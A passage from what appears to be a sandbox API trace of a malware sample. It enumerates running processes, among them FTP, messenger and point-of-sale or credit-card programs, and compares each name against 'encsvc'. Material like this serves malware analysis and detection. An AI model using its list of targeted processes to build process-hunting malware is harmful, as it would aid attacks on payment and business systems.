cchWideChar=-1, lpMultiByteStr=0x3572320, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.722] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0094.722] StrStrIA (lpFirst="smartftp.exe", lpSrch="encsvc") returned 0x0 [0094.722] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0094.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.723] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3572068 [0094.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3572068, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0094.723] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0094.723] StrStrIA (lpFirst="thunderbird.exe", lpSrch="encsvc") returned 0x0 [0094.723] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0094.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.725] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35722f0 [0094.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35722f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0094.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0094.725] StrStrIA (lpFirst="totalcmd.exe", lpSrch="encsvc") returned 0x0 [0094.725] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0094.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.726] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35720f8 [0094.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x35720f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0094.726] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0094.726] StrStrIA (lpFirst="trillian.exe", lpSrch="encsvc") returned 0x0 [0094.727] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0094.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.728] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35721d0 [0094.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0094.728] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0094.728] StrStrIA (lpFirst="webdrive.exe", lpSrch="encsvc") returned 0x0 [0094.728] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0094.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.729] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572200 [0094.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3572200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.729] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0094.729] StrStrIA (lpFirst="whatsapp.exe", lpSrch="encsvc") returned 0x0 [0094.729] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0094.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.730] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572398 [0094.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3572398, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0094.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0094.731] StrStrIA (lpFirst="winscp.exe", lpSrch="encsvc") returned 0x0 [0094.731] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0094.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.732] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cc48 [0094.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x356cc48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0094.732] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0094.732] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="encsvc") returned 0x0 [0094.732] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0094.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.733] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x356cfe8 [0094.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x356cfe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0094.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0094.733] StrStrIA (lpFirst="active-charge.exe", lpSrch="encsvc") returned 0x0 [0094.733] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0094.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.735] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572410 [0094.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3572410, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.735] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0094.735] StrStrIA (lpFirst="accupos.exe", lpSrch="encsvc") returned 0x0 [0094.735] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0094.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.736] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572368 [0094.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3572368, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0094.736] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0094.736] StrStrIA (lpFirst="afr38.exe", lpSrch="encsvc") returned 0x0 [0094.736] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0094.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.747] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35723b0 [0094.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x35723b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0094.747] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0094.747] StrStrIA (lpFirst="aldelo.exe", lpSrch="encsvc") returned 0x0 [0094.747] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0094.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.748] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3572380 [0094.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3572380, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0094.748] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0094.749] StrStrIA (lpFirst="ccv_server.exe", lpSrch="encsvc") returned 0x0 [0094.749] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0094.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0094.750] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x356cf08 [0094.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x356cf08, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0094.750] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0094.750] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="encsvc") returned 0x0 [0094.750] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0094.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.751] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x356cd88 [0094.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x356cd88, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0094.751] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0094.751] StrStrIA (lpFirst="creditservice.exe", lpSrch="encsvc") returned 0x0 [0094.751] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0094.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.753] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35723c8 [0094.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35723c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0094.753] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0094.753] StrStrIA (lpFirst="edcsvr.exe", lpSrch="encsvc") returned 0x0 [0094.753] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0094.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.754] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35723e0 [0094.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x35723e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0094.754] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0094.754] StrStrIA (lpFirst="fpos.exe", lpSrch="encsvc") returned 0x0 [0094.754] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0094.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.755] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35723f8 [0094.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35723f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0094.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0094.756] StrStrIA (lpFirst="isspos.exe", lpSrch="encsvc") returned 0x0 [0094.756] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0094.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.757] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356cf88 [0094.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x356cf88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0094.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0094.757] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="encsvc") returned 0x0 [0094.757] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0094.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.758] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571648 [0094.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3571648, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0094.758] StrStrIA (lpFirst="omnipos.exe", lpSrch="encsvc") returned 0x0 [0094.758] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0094.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.760] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35715d0 [0094.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35715d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0094.760] StrStrIA (lpFirst="spcwin.exe", lpSrch="encsvc") returned 0x0 [0094.760] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0094.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.762] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x356cda8 [0094.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x356cda8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0094.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0094.762] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="encsvc") returned 0x0 [0094.762] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0094.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.763] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571558 [0094.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3571558, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0094.763] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0094.763] StrStrIA (lpFirst="utg2.exe", lpSrch="encsvc") returned 0x0 [0094.763] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0094.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.764] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571468 [0094.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3571468, 